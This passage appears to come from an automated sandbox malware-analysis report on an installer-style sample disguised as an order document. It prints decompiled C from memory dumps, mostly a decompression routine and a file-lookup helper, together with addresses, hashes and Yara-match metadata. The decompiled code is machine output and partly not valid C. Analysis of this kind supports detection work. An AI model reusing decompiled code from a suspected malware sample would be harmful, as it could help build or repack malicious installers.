															 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
															 *(_t532 - 0x70) =  &(( *(_t532 - 0x70))[1]);
															 *(_t532 - 0xc) =  *(_t532 - 0xc) << 0x00000008 |  *( *(_t532 - 0x70)) & 0x000000ff;
															L124:
															_t451 =  *(_t532 - 0x84);
															 *(_t532 - 0x88) = _t451;
															goto L1;
														}
														goto L140;
													case 6:
														goto L0;
													case 7:
														__eflags =  *(__ebp - 0x40) - 1;
														if( *(__ebp - 0x40) != 1) {
															__eax =  *(__ebp - 0x24);
															 *((intOrPtr*)(__ebp - 0x80)) = 0x16;
															 *(__ebp - 0x20) =  *(__ebp - 0x24);
															__eax =  *(__ebp - 0x28);
															 *(__ebp - 0x24) =  *(__ebp - 0x28);
															__eax =  *(__ebp - 0x2c);
															 *(__ebp - 0x28) =  *(__ebp - 0x2c);
															__eax = 0;
															__eflags =  *(__ebp - 0x38) - 7;
															0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
															__al = __al & 0x000000fd;
															__eax = (__eflags >= 0) - 1 + 0xa;
															 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
															__eax =  *(__ebp - 4);
															__eax =  *(__ebp - 4) + 0x664;
															__eflags = __eax;
															 *(__ebp - 0x58) = __eax;
															goto L67;
														} else {
															__eax =  *(__ebp - 4);
															__ecx =  *(__ebp - 0x38);
															 *((intOrPtr*)(__ebp - 0x84)) = 8;
															__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
														}
														goto L117;
													case 8:
														__eflags =  *(__ebp - 0x40);
														if( *(__ebp - 0x40) != 0) {
															__eax =  *(__ebp - 4);
															__ecx =  *(__ebp - 0x38);
															 *((intOrPtr*)(__ebp - 0x84)) = 0xa;
															__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
														} else {
															__eax =  *(__ebp - 0x38);
															__ecx =  *(__ebp - 4);
															__eax =  *(__ebp - 0x38) + 0xf;
															 *((intOrPtr*)(__ebp - 0x84)) = 9;
															 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *((intOrPtr*)(__ebp - 0x4c));
															__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *((intOrPtr*)(__ebp - 0x4c))) * 2;
														}
														goto L117;
													case 9:
														__eflags =  *(__ebp - 0x40);
														if( *(__ebp - 0x40) != 0) {
															goto L87;
														} else {
															__eflags =  *(__ebp - 0x60);
															if( *(__ebp - 0x60) == 0) {
																goto L139;
															} else {
																__eax = 0;
																__eflags =  *(__ebp - 0x38) - 7;
																0 |  *(__ebp - 0x38) - 0x00000007 >= 0x00000000 = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
																 *(__ebp - 0x38) = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
																__eflags =  *(__ebp - 0x64);
																if( *(__ebp - 0x64) == 0) {
																	 *((intOrPtr*)(__ebp - 0x88)) = 0x1b;
																	goto L138;
																} else {
																	__eax =  *(__ebp - 0x14);
																	__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
																	__eflags = __eax -  *(__ebp - 0x74);
																	if(__eax >=  *(__ebp - 0x74)) {
																		__eax = __eax +  *(__ebp - 0x74);
																		__eflags = __eax;
																	}
																	__edx =  *(__ebp - 8);
																	__cl =  *(__eax + __edx);
																	__eax =  *(__ebp - 0x14);
																	 *(__ebp - 0x5c) = __cl;
																	 *(__eax + __edx) = __cl;
																	__eax = __eax + 1;
																	__edx = 0;
																	_t274 = __eax %  *(__ebp - 0x74);
																	__eax = __eax /  *(__ebp - 0x74);
																	__edx = _t274;
																	__eax =  *(__ebp - 0x68);
																	 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
																	 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
																	_t283 = __ebp - 0x64;
																	 *_t283 =  *(__ebp - 0x64) - 1;
																	__eflags =  *_t283;
																	 *( *(__ebp - 0x68)) = __cl;
																	goto L77;
																}
															}
														}
														goto L140;
													case 0xa:
														__eflags =  *(__ebp - 0x40);
														if( *(__ebp - 0x40) != 0) {
															__eax =  *(__ebp - 4);
															__ecx =  *(__ebp - 0x38);
															 *((intOrPtr*)(__ebp - 0x84)) = 0xb;
															__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
														} else {
															__eax =  *(__ebp - 0x28);
															goto L86;
														}
														goto L117;
													case 0xb:
														__eflags =  *(__ebp - 0x40);
														if( *(__ebp - 0x40) != 0) {
															__ecx =  *(__ebp - 0x24);
															__eax =  *(__ebp - 0x20);
															 *(__ebp - 0x20) =  *(__ebp - 0x24);
														} else {
															__eax =  *(__ebp - 0x24);
														}
														__ecx =  *(__ebp - 0x28);
														 *(__ebp - 0x24) =  *(__ebp - 0x28);
														L86:
														__ecx =  *(__ebp - 0x2c);
														 *(__ebp - 0x2c) = __eax;
														 *(__ebp - 0x28) =  *(__ebp - 0x2c);
														L87:
														__eax =  *(__ebp - 4);
														 *((intOrPtr*)(__ebp - 0x80)) = 0x15;
														__eax =  *(__ebp - 4) + 0xa68;
														 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
														L67:
														__esi =  *(__ebp - 0x58);
														 *((intOrPtr*)(__ebp - 0x84)) = 0x12;
														L117:
														 *(_t532 - 0x54) = _t525;
														goto L118;
													case 0xc:
														while(1) {
															L88:
															__eflags =  *(__ebp - 0x6c);
															if( *(__ebp - 0x6c) == 0) {
																break;
															}
															__ecx =  *(__ebp - 0x70);
															__eax =  *(__ebp - 0xc);
															 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
															__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
															 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
															 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
															_t315 = __ebp - 0x70;
															 *_t315 =  *(__ebp - 0x70) + 1;
															__eflags =  *_t315;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
															__eax =  *(__ebp - 0x2c);
															while(1) {
																_t319 = __ebp - 0x48;
																 *_t319 =  *(__ebp - 0x48) - 1;
																__eflags =  *_t319;
																__eflags =  *(__ebp - 0x48);
																if( *(__ebp - 0x48) <= 0) {
																	break;
																}
																__ecx =  *(__ebp - 0xc);
																__ebx = __ebx + __ebx;
																 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
																__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
																 *(__ebp - 0x44) = __ebx;
																if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
																	__ecx =  *(__ebp - 0x10);
																	 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
																	__ebx = __ebx | 0x00000001;
																	__eflags = __ebx;
																	 *(__ebp - 0x44) = __ebx;
																}
																__eflags =  *(__ebp - 0x10) - 0x1000000;
																if( *(__ebp - 0x10) >= 0x1000000) {
																	continue;
																} else {
																	goto L88;
																}
																goto L140;
															}
															__eax = __eax + __ebx;
															 *(__ebp - 0x40) = 4;
															 *(__ebp - 0x2c) = __eax;
															__eax =  *(__ebp - 4);
															__eax =  *(__ebp - 4) + 0x644;
															__eflags = __eax;
															__ebx = 0;
															 *(__ebp - 0x58) = __eax;
															 *(__ebp - 0x50) = 1;
															 *(__ebp - 0x44) = 0;
															 *(__ebp - 0x48) = 0;
															while(1) {
																__eax =  *(__ebp - 0x40);
																__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
																if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
																	break;
																}
																__eax =  *(__ebp - 0x50);
																 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
																__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
																__eax =  *(__ebp - 0x58);
																__esi = __edi + __eax;
																 *(__ebp - 0x54) = __esi;
																__ax =  *__esi;
																__ecx = __ax & 0x0000ffff;
																__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
																__eflags =  *(__ebp - 0xc) - __edx;
																if( *(__ebp - 0xc) >= __edx) {
																	__ecx = 0;
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
																	__ecx = 1;
																	 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
																	__ebx = 1;
																	__ecx =  *(__ebp - 0x48);
																	__ebx = 1 << __cl;
																	__ecx = 1 << __cl;
																	__ebx =  *(__ebp - 0x44);
																	__ebx =  *(__ebp - 0x44) | __ecx;
																	__cx = __ax;
																	__cx = __ax >> 5;
																	__eax = __eax - __ecx;
																	__edi = __edi + 1;
																	__eflags = __edi;
																	 *(__ebp - 0x44) = __ebx;
																	 *__esi = __ax;
																	 *(__ebp - 0x50) = __edi;
																} else {
																	 *(__ebp - 0x10) = __edx;
																	0x800 = 0x800 - __ecx;
																	0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
																	 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
																	 *__esi = __dx;
																}
																__eflags =  *(__ebp - 0x10) - 0x1000000;
																if( *(__ebp - 0x10) >= 0x1000000) {
																	L100:
																	_t349 = __ebp - 0x48;
																	 *_t349 =  *(__ebp - 0x48) + 1;
																	__eflags =  *_t349;
																	continue;
																} else {
																	__eflags =  *(__ebp - 0x6c);
																	if( *(__ebp - 0x6c) == 0) {
																		 *((intOrPtr*)(__ebp - 0x88)) = 0x10;
																		goto L138;
																	} else {
																		__ecx =  *(__ebp - 0x70);
																		__eax =  *(__ebp - 0xc);
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
																		__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
																		 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
																		 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																		_t346 = __ebp - 0x70;
																		 *_t346 =  *(__ebp - 0x70) + 1;
																		__eflags =  *_t346;
																		 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																		goto L100;
																	}
																}
																goto L140;
															}
															_t372 = __ebp - 0x2c;
															 *_t372 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t372;
															_t374 = __ebp - 0x2c;
															 *_t374 =  *(__ebp - 0x2c) + 1;
															__eflags =  *_t374;
															__eax =  *(__ebp - 0x2c);
															__eflags = __eax;
															if(__eax == 0) {
																 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
																goto L138;
															} else {
																__eflags = __eax -  *(__ebp - 0x60);
																if(__eax >  *(__ebp - 0x60)) {
																	goto L139;
																} else {
																	 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
																	__eax =  *(__ebp - 0x30);
																	_t381 = __ebp - 0x60;
																	 *_t381 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
																	__eflags =  *_t381;
																	while(1) {
																		__eflags =  *(__ebp - 0x64);
																		if( *(__ebp - 0x64) == 0) {
																			break;
																		}
																		__eax =  *(__ebp - 0x14);
																		__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
																		__eflags = __eax -  *(__ebp - 0x74);
																		if(__eax >=  *(__ebp - 0x74)) {
																			__eax = __eax +  *(__ebp - 0x74);
																			__eflags = __eax;
																		}
																		__edx =  *(__ebp - 8);
																		__cl =  *(__eax + __edx);
																		__eax =  *(__ebp - 0x14);
																		 *(__ebp - 0x5c) = __cl;
																		 *(__eax + __edx) = __cl;
																		__eax = __eax + 1;
																		__edx = 0;
																		_t395 = __eax %  *(__ebp - 0x74);
																		__eax = __eax /  *(__ebp - 0x74);
																		__edx = _t395;
																		__eax =  *(__ebp - 0x68);
																		 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
																		 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
																		 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																		__eflags =  *(__ebp - 0x30);
																		 *( *(__ebp - 0x68)) = __cl;
																		 *(__ebp - 0x14) = __edx;
																		if( *(__ebp - 0x30) > 0) {
																			continue;
																		} else {
																			goto L78;
																		}
																		goto L140;
																	}
																	 *((intOrPtr*)(__ebp - 0x88)) = 0x1c;
																	goto L138;
																}
															}
															goto L140;
														}
														 *((intOrPtr*)(__ebp - 0x88)) = 0xc;
														goto L138;
													case 0xd:
														goto L36;
												}
											}
										}
									} else {
										goto L40;
									}
								}
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *((intOrPtr*)(__ebp - 0x88)) = 0xd;
									L138:
									_t486 = 0x22;
									memcpy( *(_t532 - 0x90), _t532 - 0x88, _t486 << 2);
									_t453 = 0;
								} else {
									__ecx =  *(__ebp - 0x70);
									__eax =  *(__ebp - 0xc);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
									__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
									 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
									 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
									_t121 = __ebp - 0x70;
									 *_t121 =  *(__ebp - 0x70) + 1;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
									goto L38;
								}
							}
						}
					}
					L140:
					return _t453;
				}
			}

0x00000000
0x00406725
0x00406725
0x0040672a
0x004067a1
0x004067a8
0x004067b2
0x00000000
0x0040672c
0x0040672c
0x00406730
0x00406738
0x0040673b
0x0040673d
0x00406740
0x00406742
0x00406747
0x0040674a
0x00406751
0x00406758
0x0040675b
0x00406766
0x0040676e
0x0040676e
0x00406768
0x00406768
0x00406768
0x0040675d
0x0040675d
0x0040675d
0x00406775
0x00406793
0x00406795
0x00406968
0x00406968
0x0040696b
0x0040696e
0x00406971
0x00406974
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406986
0x0040699e
0x004069a1
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069b0
0x00406988
0x00406988
0x00406990
0x00406995
0x00406997
0x00406999
0x00406999
0x004069ba
0x004069bd
0x00000000
0x004069bf
0x0040693f
0x00406f47
0x00000000
0x00406945
0x00406945
0x00406948
0x0040694b
0x0040694f
0x00406952
0x00406958
0x0040695a
0x0040695a
0x0040695d
0x00000000
0x0040695d
0x0040693f
0x00000000
0x00406960
0x00406960
0x00000000
0x00406777
0x00406777
0x0040677a
0x00406780
0x00406782
0x00406782
0x00406785
0x00406788
0x0040678a
0x0040678b
0x0040678e
0x004067fb
0x004067fb
0x004067ff
0x00406802
0x00406805
0x00406808
0x0040680b
0x0040680c
0x0040680f
0x00406811
0x00406817
0x0040681a
0x0040681d
0x00406820
0x00406823
0x00406829
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406855
0x0040685b
0x0040685f
0x0040682b
0x0040682b
0x0040682f
0x00406837
0x0040683c
0x0040683e
0x00406840
0x00406840
0x00406869
0x0040686c
0x004067e3
0x004067e3
0x004067e9
0x0040689c
0x004068a2
0x00000000
0x00000000
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068c2
0x004068da
0x004068dd
0x004068e0
0x004068e3
0x004068e3
0x004068e6
0x004068ec
0x004068c4
0x004068c4
0x004068cc
0x004068d1
0x004068d3
0x004068d5
0x004068d5
0x004068f6
0x004068f9
0x00000000
0x004068fb
0x0040687b
0x00406f3b
0x00000000
0x00406881
0x00406881
0x00406884
0x00406887
0x0040688b
0x0040688e
0x00406894
0x00406896
0x00406896
0x00406899
0x00000000
0x00406899
0x0040687b
0x00000000
0x004068f9
0x00000000
0x004067ef
0x004067f5
0x00406900
0x00406900
0x00406900
0x00406904
0x00406904
0x00406907
0x0040690e
0x00406f53
0x00000000
0x00406914
0x00406914
0x00406917
0x0040691a
0x0040691d
0x00406920
0x00406923
0x00406926
0x00406928
0x0040692b
0x0040692e
0x00406931
0x00406933
0x00406933
0x00406933
0x00406ad0
0x00406ad0
0x00406ad3
0x00406ad3
0x004065a9
0x004065a9
0x004065b2
0x00406fc0
0x00406fc0
0x004065b8
0x004065b8
0x00000000
0x004065c3
0x00000000
0x004065c9
0x004065cc
0x004065cf
0x004065d2
0x004065d6
0x00000000
0x004065dc
0x004065dc
0x004065df
0x004065e1
0x004065e2
0x004065e5
0x004065e7
0x004065e8
0x004065ea
0x004065ed
0x004065f2
0x004065f7
0x00406600
0x00406613
0x00406616
0x00406622
0x0040664a
0x0040664c
0x0040664e
0x00406651
0x00406652
0x00406652
0x0040664e
0x0040665a
0x0040665e
0x00000000
0x00406624
0x00406628
0x0040662d
0x0040662d
0x00406636
0x0040663e
0x00406641
0x00000000
0x00406647
0x00406647
0x00000000
0x00406647
0x00406641
0x00406622
0x004065d6
0x00000000
0x00000000
0x00406664
0x00406664
0x00406668
0x00406f14
0x00000000
0x0040666e
0x00406671
0x00406681
0x00406684
0x00406687
0x00406687
0x00406687
0x0040668a
0x0040668e
0x00000000
0x00406690
0x00406690
0x00406696
0x004066c0
0x004066c6
0x004066cd
0x00000000
0x00406698
0x0040669c
0x0040669f
0x004066a4
0x004066a4
0x004066af
0x004066b7
0x004066ba
0x00000000
0x00000000
0x00000000
0x00000000
0x004066ba
0x00406696
0x0040668e
0x00000000
0x00000000
0x004066ff
0x00406705
0x00406708
0x00406715
0x0040671d
0x00000000
0x00000000
0x004066d4
0x004066d4
0x004066d8
0x00406f23
0x00000000
0x004066de
0x004066e4
0x004066ef
0x004066ef
0x004066ef
0x004066f2
0x004066f5
0x004066f8
0x004066fd
0x00000000
0x00000000
0x00000000
0x00000000
0x004066fd
0x00000000
0x00000000
0x00406d94
0x00406d94
0x00406d9a
0x00406da0
0x00406da6
0x00406dc0
0x00406dc3
0x00406dc9
0x00406dd4
0x00406dd4
0x00406dd6
0x00406da8
0x00406da8
0x00406db7
0x00406dbb
0x00406dbb
0x00406de0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406de2
0x00406de6
0x00406f95
0x00000000
0x00406dec
0x00406df2
0x00406df9
0x00406e01
0x00406e04
0x00406e07
0x00406e07
0x00406e0d
0x00000000
0x00406e0d
0x00000000
0x00000000
0x00000000
0x00000000
0x004069c4
0x004069c8
0x004069e6
0x004069e9
0x004069f0
0x004069f3
0x004069f6
0x004069f9
0x004069fc
0x004069ff
0x00406a01
0x00406a08
0x00406a09
0x00406a0b
0x00406a0e
0x00406a11
0x00406a14
0x00406a14
0x00406a19
0x00000000
0x004069ca
0x004069ca
0x004069cd
0x004069d0
0x004069da
0x004069da
0x00000000
0x00000000
0x00406a2e
0x00406a32
0x00406a55
0x00406a58
0x00406a5b
0x00406a65
0x00406a34
0x00406a34
0x00406a37
0x00406a3a
0x00406a3d
0x00406a4a
0x00406a4d
0x00406a4d
0x00000000
0x00000000
0x00406a71
0x00406a75
0x00000000
0x00406a7b
0x00406a7b
0x00406a7f
0x00000000
0x00406a85
0x00406a85
0x00406a87
0x00406a8e
0x00406a92
0x00406a95
0x00406a99
0x00406f5f
0x00000000
0x00406a9f
0x00406a9f
0x00406aa2
0x00406aa5
0x00406aa8
0x00406aaa
0x00406aaa
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abd
0x00406abf
0x00406abf
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406acb
0x00406acb
0x00406acb
0x00406ace
0x00000000
0x00406ace
0x00406a99
0x00406a7f
0x00000000
0x00000000
0x00406ae2
0x00406ae6
0x00406aed
0x00406af0
0x00406af3
0x00406afd
0x00406ae8
0x00406ae8
0x00000000
0x00406ae8
0x00000000
0x00000000
0x00406b09
0x00406b0d
0x00406b14
0x00406b17
0x00406b1a
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b1d
0x00406b20
0x00406b23
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2c
0x00406b2f
0x00406b36
0x00406b3b
0x00406a1c
0x00406a1c
0x00406a1f
0x00406d91
0x00406d91
0x00000000
0x00000000
0x00406bc9
0x00406bc9
0x00406bc9
0x00406bcd
0x00000000
0x00000000
0x00406bd3
0x00406bd6
0x00406bd9
0x00406bdd
0x00406be0
0x00406be6
0x00406be8
0x00406be8
0x00406be8
0x00406beb
0x00406bee
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf4
0x00406bf8
0x00000000
0x00000000
0x00406bfa
0x00406bfd
0x00406bff
0x00406c02
0x00406c05
0x00406c08
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c13
0x00406c16
0x00406c1d
0x00000000
0x00406c1f
0x00000000
0x00406c1f
0x00000000
0x00406c1d
0x00406c24
0x00406c26
0x00406c2d
0x00406c30
0x00406c33
0x00406c33
0x00406c38
0x00406c3a
0x00406c3d
0x00406c44
0x00406c47
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00000000
0x00000000
0x00406c7c
0x00406c82
0x00406c85
0x00406c88
0x00406c8b
0x00406c8e
0x00406c91
0x00406c94
0x00406c97
0x00406c9a
0x00406c9d
0x00406cb6
0x00406cb8
0x00406cbb
0x00406cbc
0x00406cbf
0x00406cc1
0x00406cc4
0x00406cc6
0x00406cc8
0x00406ccb
0x00406ccd
0x00406cd0
0x00406cd4
0x00406cd6
0x00406cd6
0x00406cd7
0x00406cda
0x00406cdd
0x00406c9f
0x00406c9f
0x00406ca7
0x00406cac
0x00406cae
0x00406cb1
0x00406cb1
0x00406ce0
0x00406ce7
0x00406c71
0x00406c71
0x00406c71
0x00406c71
0x00000000
0x00406ce9
0x00406c4c
0x00406c50
0x00406f77
0x00000000
0x00406c56
0x00406c56
0x00406c59
0x00406c5c
0x00406c60
0x00406c63
0x00406c69
0x00406c6b
0x00406c6b
0x00406c6b
0x00406c6e
0x00000000
0x00406c6e
0x00406c50
0x00000000
0x00406ce7
0x00406cee
0x00406cee
0x00406cee
0x00406cf1
0x00406cf1
0x00406cf1
0x00406cf4
0x00406cf7
0x00406cf9
0x00406f83
0x00000000
0x00406cff
0x00406cff
0x00406d02
0x00000000
0x00406d08
0x00406d08
0x00406d0c
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d12
0x00406d12
0x00406d16
0x00000000
0x00000000
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d27
0x00406d27
0x00406d27
0x00406d2a
0x00406d2d
0x00406d30
0x00406d33
0x00406d36
0x00406d39
0x00406d3a
0x00406d3c
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d42
0x00406d45
0x00406d48
0x00406d4b
0x00406d4f
0x00406d51
0x00406d54
0x00000000
0x00406d56
0x00000000
0x00406d56
0x00000000
0x00406d54
0x00406f89
0x00000000
0x00406f89
0x00406d02
0x00000000
0x00406cf9
0x00406f6b
0x00000000
0x00000000
0x00000000
0x00000000
0x004065b8
0x004065b2
0x00000000
0x00000000
0x00000000
0x004067f5
0x00406872
0x004067be
0x004067c2
0x00406f2f
0x00406fab
0x00406fb3
0x00406fba
0x00406fbc
0x004067c8
0x004067c8
0x004067cb
0x004067ce
0x004067d2
0x004067d5
0x004067db
0x004067dd
0x004067dd
0x004067e0
0x00000000
0x004067e0
0x004067c2
0x0040686c
0x00406775
0x00406fc3
0x00406fc7
0x00406fc7

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33747ec9ccf1e96e03ed3acadba13ccb82446055e1a2ca0fa1c9679c5aff3799
Instruction ID: 4aa70ef1b53fe275c3baa8fcae8ec6f6e0a9bb882f540f469220498d10fac131
Opcode Fuzzy Hash: 33747ec9ccf1e96e03ed3acadba13ccb82446055e1a2ca0fa1c9679c5aff3799
Instruction Fuzzy Hash: E9F16671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D7785A9ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040639C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040639C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x422580); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x422580;
			}

0x004063a7
0x004063b0
0x00000000
0x004063bd
0x004063b3
0x00000000

APIs

FindFirstFileA.KERNELBASE(77313410,00422580,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,00405B62,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,77313410,?,77312EE0,00405881,?,77313410,77312EE0), ref: 004063A7
FindClose.KERNEL32(00000000), ref: 004063B3

Strings

C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp, xrefs: 0040639C

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp
API String ID: 2295610775-1012084975
Opcode ID: 650a356e45ca360fc625af9c332ec7d5af07b83f4ad3dd0750b8552cb66ed4f4
Instruction ID: 7ad18ffb452888df832aaad39da4d842c40e8f76539fb63f13b43eacc156c169
Opcode Fuzzy Hash: 650a356e45ca360fc625af9c332ec7d5af07b83f4ad3dd0750b8552cb66ed4f4
Instruction Fuzzy Hash: 7CD012316050306BC20117386E0C84B7A5C9F053307119B37F9A6F12E0D7748CB286DD

Uniqueness

Uniqueness Score: -1.00%

Function 0350A311 Relevance: 2.9, Strings: 2, Instructions: 447COMMON

Download Yara Rule

Strings

_k, xrefs: 0350A6AC
_, xrefs: 0350A434

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: _$_k
API String ID: 0-2677134695
Opcode ID: fd5d99b9b17f6849091534cfa48f6f4f4c4daa9627e0ab1ee6b07db74181dae4
Instruction ID: 408a3946621db8bf7b2625780df7212be148bc9e9a57ec27c1f74bf711f26178
Opcode Fuzzy Hash: fd5d99b9b17f6849091534cfa48f6f4f4c4daa9627e0ab1ee6b07db74181dae4
Instruction Fuzzy Hash: 9B02347560434A8FDB34DE38D9947DA37B2FF56350F98422ECC8A8B651D3318A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03511474 Relevance: 1.6, Strings: 1, Instructions: 376COMMON

Download Yara Rule

Strings

h, xrefs: 0350397B

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 323e50dc95b5325c4bc30e221081ae112a23464f8c483858dfb56c93a9f79cee
Instruction ID: d7c609e5ccc8aacbd734e4ca8ca0462cdf6b973a5962ca2ab9f936d39169714a
Opcode Fuzzy Hash: 323e50dc95b5325c4bc30e221081ae112a23464f8c483858dfb56c93a9f79cee
